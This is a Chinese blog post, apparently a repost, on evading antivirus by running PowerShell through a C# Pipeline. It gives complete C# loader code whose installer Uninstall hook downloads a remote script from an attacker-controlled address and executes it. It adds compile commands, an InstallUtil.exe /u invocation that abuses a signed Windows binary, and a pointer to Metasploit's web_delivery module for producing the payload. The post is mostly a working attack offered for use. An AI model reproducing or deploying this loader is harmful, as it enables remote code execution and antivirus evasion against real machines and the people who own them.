zoukankan      html  css  js  c++  java
  • Csharp使用Pipeline管道来执行PS规避杀软

    落地代码如下

    using System;
    using System.Net;
    using System.IO;
    using System.Configuration.Install;
    using System.Runtime.InteropServices;
    using System.Management.Automation.Runspaces;
    
    
    public class Program
    {
        public static void Main()
        {
            //Console.WriteLine("test");
        }
    }
    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            Mycode.Exec();
        }
    }
    public class Mycode
    {
        public static void Exec()
        {
            WebClient client = new WebClient();
            //远程执行命令
            Stream stream = client.OpenRead("http://192.168.xxx.xxx/powershell.txt");
            StreamReader reader = new StreamReader(stream);
            String command = reader.ReadToEnd();
            //String command = "powershell.exe -c calc";
            //Console.WriteLine(text);
    
            //string command = System.IO.File.ReadAllText(text);
            RunspaceConfiguration rspacecfg = RunspaceConfiguration.Create();
            Runspace rspace = RunspaceFactory.CreateRunspace(rspacecfg);
            rspace.Open();
            Pipeline pipeline = rspace.CreatePipeline();
            pipeline.Commands.AddScript(command);
            pipeline.InvokeAsync();
            while (pipeline.PipelineStateInfo.State == PipelineState.Running || pipeline.PipelineStateInfo.State == PipelineState.Stopping)
            {
                System.Threading.Thread.Sleep(50);
            }
            Console.WriteLine("Installing...");
    
            foreach (object item in pipeline.Output.ReadToEnd())
            {
                if (item != null)
                {
                    Console.WriteLine(item.ToString());
                }
            }
            foreach (object item in pipeline.Error.ReadToEnd())
            {
                if (item != null)
                {
                    Console.WriteLine(item.ToString());
                }
            }
        }
    }

    保存为Program.cs文件后执行如下命令:

    在MSF上使用multi/script/web_delivery生成PSH模块
    
    >C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /r:C:WindowsMicrosoft.NETassemblyGAC_MSILSystem.Management.Automationv4.0_3.0.0.0__31bf3856ad364e35System.Management.Automation.dll /unsafe /platform:anycpu /out:ps.exe Program.cs
    
    >C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /logfile= /LogToConsole=True /u .ps.exe

    其中DLL的文件可以通过powershell执行[psobject].Assembly.Location查询到

     VirusTotal

  • 相关阅读:
    ML-线性回归
    ML-决策树
    numpy常用知识点备忘(2)
    numpy常用知识点备忘
    ML-朴素贝叶斯算法
    Git常用命令备忘
    机器学习-决策树算法
    机器学习-线性模型(线性回归与逻辑回归)
    深入JVM内核(四)垃圾回收器与GC参数
    深入JVM内核(三)对象存活判定算法与垃圾收集算法
  • 原文地址:https://www.cnblogs.com/wh4am1/p/14366800.html
Copyright © 2011-2022 走看看